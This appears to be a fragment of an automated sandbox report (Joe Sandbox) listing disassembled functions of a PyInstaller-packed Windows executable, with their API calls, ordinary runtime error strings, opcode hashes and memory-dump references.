                                                                                                                                                                      • API String ID: 190572456-4266016200
                                                                                                                                                                      • Opcode ID: 75da080be946a2cd8ba8e1b454c823e383fc18c1915e405073f2aaa9ec7d6da3
                                                                                                                                                                      • Instruction ID: 9f64be5151cd894e400576c56bf008781c0a9af9d029130a408ec45c96dc2600
                                                                                                                                                                      • Opcode Fuzzy Hash: 75da080be946a2cd8ba8e1b454c823e383fc18c1915e405073f2aaa9ec7d6da3
                                                                                                                                                                      • Instruction Fuzzy Hash: 581261A4E8EB0390FF5ACB19E85057423F1AF59790B946435C82E973A4EF7CB569B300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D1EF0 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                      • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                      • API String ID: 2446303242-1601438679
                                                                                                                                                                      • Opcode ID: bd898f0db48e12eacbe359e455c65c9f86494896ecfc44a00e7b3fd1842e94f6
                                                                                                                                                                      • Instruction ID: efbd25481952074c16734d6c047db77698b6af13268dcd6960cea966ba415f01
                                                                                                                                                                      • Opcode Fuzzy Hash: bd898f0db48e12eacbe359e455c65c9f86494896ecfc44a00e7b3fd1842e94f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 42A16C76A08B8587E714CF12E55479AB3B0FB88B84F50452AEB9D47B28CF3DE165CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F45CC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                      • Opcode ID: 0ccec4e05d241f6952ecbbf9a3ebe3f86c42949c8e32c68598c284628b963db6
                                                                                                                                                                      • Instruction ID: 77a0b4049f423e67124d1ea86c3cca839823efeb7faff409ecd3043ece27af0e
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ccec4e05d241f6952ecbbf9a3ebe3f86c42949c8e32c68598c284628b963db6
                                                                                                                                                                      • Instruction Fuzzy Hash: 51B2BE72E1C2828BF7658E68D540BFD37E1FB54388F545135DA2E97B88DF38AA049B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8510 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00007FF6313D29FE,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D8537
                                                                                                                                                                      • FormatMessageW.KERNEL32 ref: 00007FF6313D8566
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 00007FF6313D85BC
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                      • API String ID: 2920928814-3505189403
                                                                                                                                                                      • Opcode ID: bc7b3eaa85e9f8c684efbfb0abf8c740a9d6d3509a191f947940c97d6b2913ba
                                                                                                                                                                      • Instruction ID: fcc730c6fe9bea3c7f4aaefe345eb64c115da2a067a142cd1d83326bf40900c7
                                                                                                                                                                      • Opcode Fuzzy Hash: bc7b3eaa85e9f8c684efbfb0abf8c740a9d6d3509a191f947940c97d6b2913ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 28213B71E0CA4292FB649B15EC5437A63A5FF88384F840135E69DC27A9EF3CE555E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DC52C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: bd7f2f980a7da6926a80c9d6d5668f96453f81ee33dc92f3020e8ba00438ebde
                                                                                                                                                                      • Instruction ID: 42d73d99ffcc556996292c74cde7a621dab793e68da13423882a9cdb90555544
                                                                                                                                                                      • Opcode Fuzzy Hash: bd7f2f980a7da6926a80c9d6d5668f96453f81ee33dc92f3020e8ba00438ebde
                                                                                                                                                                      • Instruction Fuzzy Hash: A0315CB2A18B818AFB609F61E8503ED73A5FB84744F44443ADA4E87B98DF3CD648D714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EAA88 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: 7216508a44e270dbe74d940196730f6ae427e6a408c85f6a39dc9bb5e9d9eeec
                                                                                                                                                                      • Instruction ID: 41c803b9b8acda0b8a184d4f0a67766434d6197ae653dfecd00f41b4ad866f37
                                                                                                                                                                      • Opcode Fuzzy Hash: 7216508a44e270dbe74d940196730f6ae427e6a408c85f6a39dc9bb5e9d9eeec
                                                                                                                                                                      • Instruction Fuzzy Hash: 9631A376A18F8186EB60CF25E8403AE73A0FB89794F500135EA9D83B98DF3CD645CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F1D94 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                      • Opcode ID: 5b08ba71cf53a859679ca3725f02dc9f6ff5d13e2ee69dd84dd7cfc9c3e683b4
                                                                                                                                                                      • Instruction ID: 8295b1789e93fcba3bacf41aef997bf683be3546b8d3667fda53613f4017eb65
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b08ba71cf53a859679ca3725f02dc9f6ff5d13e2ee69dd84dd7cfc9c3e683b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 93B1B362F1C69281FB61DB22E4105BA63E1EB58BE4F445131EA6D87BD5DF3CE845E300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313DC410 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      • Opcode ID: a5550d9be1c0b415d16e930586c9cd762ba62d5a2847c086dd54dcf240d88082
                                                                                                                                                                      • Instruction ID: b78b2a23bda499100344071de63c9b188794313315b3be1a8285ce49ccf97392
                                                                                                                                                                      • Opcode Fuzzy Hash: a5550d9be1c0b415d16e930586c9cd762ba62d5a2847c086dd54dcf240d88082
                                                                                                                                                                      • Instruction Fuzzy Hash: FD117C76F14F058AFB00CF60E8442B933A4FB58758F040E31DA6D867A8DF78D1A89380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F4130 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                      • Instruction ID: 4b4ce53c16402983e4f82a6e9f4ee4be48d67e74a5d641780ccb3b003013bed3
                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FC1D172B1C28687E724CF59A04866AB7E1F784B84F458135DB6E97B44DF3DE801CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F9EA8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                      • Opcode ID: 573902758330cef39c5d4c46541062d655f0f5807630df07073b8173e5cf79ed
                                                                                                                                                                      • Instruction ID: 4774109e8ccbb575590eb04b8557856a626c50f878bd9c199f968fc8fdf22067
                                                                                                                                                                      • Opcode Fuzzy Hash: 573902758330cef39c5d4c46541062d655f0f5807630df07073b8173e5cf79ed
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FB12A77A04B898BEB15CF29C8863687BE0F784F88F158926DA6D877A4CF39D451D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313D8880 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                      • Opcode ID: bee6a5b65c38c73ae96c9afab633c03bfb21d8601624e0d1433da97daea3c534
                                                                                                                                                                      • Instruction ID: 54ca9fe8d91c01a753bd877e8a128ce20ab3db728754ad01771aa78280ca6358
                                                                                                                                                                      • Opcode Fuzzy Hash: bee6a5b65c38c73ae96c9afab633c03bfb21d8601624e0d1433da97daea3c534
                                                                                                                                                                      • Instruction Fuzzy Hash: 20F04F72E186858AF7A08F64F48976A7390FF84728F044335D66D467E8DF3CE458AB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E3A94 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $
                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                      • Opcode ID: eb253334f3b2123b75c41e14b25340356869d8081e136acde1c9d78a5cce5154
                                                                                                                                                                      • Instruction ID: 47e51bfc7d67ad501a46a349a3a23644e71de0a3bf79f48f8f9c775d5687e1b5
                                                                                                                                                                      • Opcode Fuzzy Hash: eb253334f3b2123b75c41e14b25340356869d8081e136acde1c9d78a5cce5154
                                                                                                                                                                      • Instruction Fuzzy Hash: E9E1A033E0874682FB688A29815017D33A0FF45B58F247235DA4E87794DF3AEE51E762
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EE360 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                      • Opcode ID: 0b170b41c43961ebac1ef0d609b29da04a4ec4d2605dd63797325ec0b21ead84
                                                                                                                                                                      • Instruction ID: d4ee2b352a3731fe9f8c9ecbec67bf7888e19ead4973ad921c0ddf401b715e7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b170b41c43961ebac1ef0d609b29da04a4ec4d2605dd63797325ec0b21ead84
                                                                                                                                                                      • Instruction Fuzzy Hash: D5515563F187C586F7248E35A800769BB91F744B94F48A231CBAC8BBC5DE3DE9459B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313EDECC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                      • API String ID: 0-1523873471
                                                                                                                                                                      • Opcode ID: 7688a012653018b8f058c6a29e93a84e120e5f9f036dc2bf3f255d77f4e3d626
                                                                                                                                                                      • Instruction ID: f0e0af78a82bd4835c32114ac7120ab4f79aa834208c5d8058f09df385747f82
                                                                                                                                                                      • Opcode Fuzzy Hash: 7688a012653018b8f058c6a29e93a84e120e5f9f036dc2bf3f255d77f4e3d626
                                                                                                                                                                      • Instruction Fuzzy Hash: 86A13573E097C686FB21CF26E4007A97B91AB54B84F04A131DE8D87781DE3DEA15E711
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313E8580 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: TMP
                                                                                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                                                                                      • Opcode ID: 3fc9d058db2755ff66f7b9c9da586ed4d63d2550896a26aa3553a0b1b8628658
                                                                                                                                                                      • Instruction ID: ad81ed58e8920062f225d419749c934eadf864b9e0e35d015cf0a4985eac692b
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fc9d058db2755ff66f7b9c9da586ed4d63d2550896a26aa3553a0b1b8628658
                                                                                                                                                                      • Instruction Fuzzy Hash: 1451C113F0874282FB64AB2769111BA62D1EF44BD4F486474DE0ED77D2EE3CEE126690
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6313F39A0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
